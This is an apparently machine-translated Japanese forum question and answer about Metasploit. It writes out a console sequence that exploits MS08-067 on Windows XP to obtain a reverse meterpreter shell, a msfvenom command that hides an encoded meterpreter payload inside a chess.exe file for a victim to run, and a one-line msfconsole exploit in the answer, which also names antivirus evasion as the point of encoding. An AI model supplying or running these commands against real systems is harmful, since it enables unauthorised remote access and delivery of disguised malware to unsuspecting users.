私はMetasploitの初心者です。まだ基本を学習していますが、私は混乱しており、助けをお願いします。
1)-以前、私はO.Sを単に悪用する方法を学びました。 meterpreterを使用した脆弱性。ターゲットシステムにエクスプロイトを送信し、制御用のバインド/リバースシェルを作成できます。例-
MS08-067エクスプロイトを使用してWindows XPをハッキングする
_msf > use exploit/windows/smb/ms08_067_netapi
_ msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
_payload => windows/meterpreter/reverse_tcp
_
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
(ターゲット)_RHOST => 192.168.1.4
_
msf exploit(ms08_067_netapi) > exploit
_meterpreter > sysinfo
_ _meterpreter > Shell
_
上記のコマンドにより、攻撃者のマシンからターゲットのシェルを使用できます。ターゲットの脆弱なシステムに接続するために、exeファイルを作成する必要はありません。 Meterpreterは自動的にメモリを注入し、シェルを取得できます。
2)-
エンコーダーを使用するときは、exeを作成し、exe内にペイロードをバインドする必要があります。被害者がこのexeを実行すると、被害者のシステムシェルを取得できます。
_msfvenom -p windows/meterpreter/reverse_tcp LHOST= "" LPORT= ""-x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe
_
被害者のシステムを悪用するには、このexeをシステムに転送する必要があります。
質問:
以前は、システムを悪用するために実行ファイルは必要ありませんでしたが、エンコーダーを使用して、ペイロードを非表示にする実行ファイルが必要です。 exeなしでmeterpreter tcp_bindペイロードを単純にエンコードし、これを被害者のシステムに送信できますか?
どんな助けも本当に感謝します。
バックグラウンド情報(メタスプロイトは私のジャムであるため):ほとんどの最新のシステムは、リモート攻撃の影響をあまり受けません(ほのめかしているように)。指定したリモートアクセスペイロードは、Windows XPなどで使用されます。msfvenomやその他のものが、exeと組み合わせて使用される理由は、アンチウイルスの試行と回避に使用できるためです。 (ただし、エンコーディングは悪い文字を取り除くために使用されますが、アンチウイルスには何かが見えなくなります。)
回答:はい、システムを直接利用できますが、ペイロードを指定する必要はありません。 ms08での悪用に成功すると、meterpreterセッションが開かれます。
エクスプロイトの例:msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set rhost <IP>; exploit"
これは、この特定のペイロードの 便利なリンク です。
(これが以前にあなたが意図したものである場合)